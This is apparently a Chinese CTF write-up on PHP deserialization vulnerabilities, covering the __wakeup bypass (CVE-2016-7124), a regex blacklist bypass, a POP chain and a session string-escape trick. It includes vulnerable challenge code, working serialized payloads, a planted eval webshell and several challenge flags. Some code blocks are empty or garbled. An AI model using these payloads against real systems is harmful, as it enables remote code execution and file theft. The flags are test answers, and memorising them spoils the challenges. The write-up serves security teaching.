serialize()函数
$s
= serialize($变量);
//该函数将变量数据进行序列化转换为字符串
file_put_contents
(‘./目标文本文件',
$s
);
//将$s保存到指定文件
|
了解了缩写的类型字母,便可以得到PHP序列化格式
1 2 |
|
unserialize()函数
$s
=
file_get_contents
(‘./目标文本文件');
//取得文本文件的内容(之前序列化过的字符串)
$变量 = unserialize(
$s
);
//将该文本内容,反序列化到指定的变量中
魔术方法
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
wakeup()魔法函数绕过
1 2 |
|
PHP反序列化漏洞CVE-2016-7124
#a#重点:当反序列化字符串中,表示属性个数的值大于真实属性个数时,会绕过 __wakeup 函数的执行
class xctf{ //定义一个名为xctf的类 public $flag = '111'; //定义一个公有的类属性$flag,值为111 public function __wakeup(){ //定义一个公有的类方法__wakeup(),输出bad requests后退出当前脚本 exit('bad requests'); } } ?code=
the answer is : cyberpeace{24a1e95dab10ea486aed8d9ffccbcbd1}
highlight_file() 函数对文件进行语法高亮显示。
highlight_file(filename,return)
参数 | 描述 |
---|---|
filename | 必需。要进行高亮处理的 PHP 文件的路径。 |
return | 可选。如果设置 true,则本函数返回高亮处理的代码。 |
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; (赋值) } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { //需绕过 if ($this->file != 'index.php') { //the secret is in the fl4g.php(提示) $this->file = 'index.php'; } } } if (isset($_GET['var'])) { $var = base64_decode($_GET['var']); //base64解码 if (preg_match('/[oc]:\d+:/i', $var)) { //黑名单'o:c',可以用'o:+c'替代 die('stop hacking!'); } else { @unserialize($var); } } else { highlight_file("index.php"); } ?>
“O:+4:“Demo”:3:{s:10:“Demofile”;s:8:“fl4g.php”;}”
$flag="ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}
<?php include 'class.php'; $select = $_GET['select'];//传入参数 $res=unserialize(@$select); ?>
<?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; //初始化 public function __construct($username,$password){ $this->username = $username; $this->password = $password; //赋值 } function __wakeup(){ $this->username = 'guest'; //需绕过 } function __destruct(){ if ($this->password != 100) { echo "</br>NO!!!hacker!!!</br>"; echo "You name is: "; echo $this->username;echo "</br>"; echo "You password is: "; echo $this->password;echo "</br>"; die(); //password=100 } if ($this->username === 'admin') { //username='admin' global $flag; echo $flag; }else{ echo "</br>hello my friend~~</br>sorry i can't give you the flag!"; die(); } } } ?>
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
flag{d2e7fc8f-788c-45b9-a16b-a84c7a09ee20}
<?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); //3. 引发_call函数 } } class fin { public $f1; public function __destruct() { echo $this->f1 . '114514'; //6. 调用_tostring()函数 } public function run() { ($this->f1)(); } public function __call($a, $b) { echo $this->f1->get_flag(); //2. 调用get_flag()函数 } } class what { public $a; public function __toString() { $this->a->run(); //5. 调用run()函数 return 'hello'; } } class mix { public $m1; public function run() { ($this->m1)(); //4. 引发_invoke函数 } public function get_flag() { eval('#'.$this->m1); //1.目标 } } highlight_file(__FILE__); if (isset($_POST['pop'])) { unserialize($_POST['pop']); }
<?php class crow { public $v1; public $v2; public function __construct($v1) { $this->v1 = $v1; } } class fin { public $f1; public function __construct($f1) { $this->f1 = $f1; } } class what { public $a; public function __construct($a) { $this->a = $a; } } class mix { public $m1; public function __construct($m1) { $this->m1 = $m1; } } $f = new mix("?><?=eval(\$_POST[1]);"); $e = new fin($f); $d = new crow($e); $c = new mix($d); $b = new what($c); $a = new fin($b); echo urlencode(serialize($a)); //O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?> //cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"fin":1:{s:2:"f1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?><?=eval($_POST[1]);";}}s:2:"v2";N;}}}}&1
a:2:{s:7:"flagphp";
s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";
s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
a:2:{s:7:" ";s:48: ";s:1:"a";
s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";
s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
<?php $function = @$_GET['f']; //构造过滤函数 function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSION); } //初赋值 $_SESSION["user"] = 'guest'; $_SESSION['function'] = $function; extract($_POST); //可以实现变量覆盖 if(!$function){ echo '<a href="index.php?f=highlight_file">source_code</a>'; } if(!$_GET['img_path']){ $_SESSION['img'] = base64_encode('guest_img.png'); //img赋值 }else{ $_SESSION['img'] = sha1(base64_encode($_GET['img_path'])); } $serialize_info = filter(serialize($_SESSION)); if($function == 'highlight_file'){ highlight_file('index.php'); }else if($function == 'phpinfo'){ eval('phpinfo();'); //maybe you can find something in here!(发现d0g3_f1ag.php) }else if($function == 'show_image'){ //确定function的值 $userinfo = unserialize($serialize_info); echo file_get_contents(base64_decode($userinfo['img'])); //目标 }
_SESSION[function]=show_image&_SESSION[1]=";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
a:3:{s:8:"function";s:10:"show_image"
;i:1;s:41:"";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";
s:3:"img";s:40:"349ae14b24d23cca50fb83d84fb6039f882a3645";}
a:3:{s:8:"function";s:22:"show_image";i:1;s:60:"";
s:3:"qwe";s:2:"qw";
s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
";s:3:"img";s:40:"349ae14b24d23cca50fb83d84fb6039f882a3645";}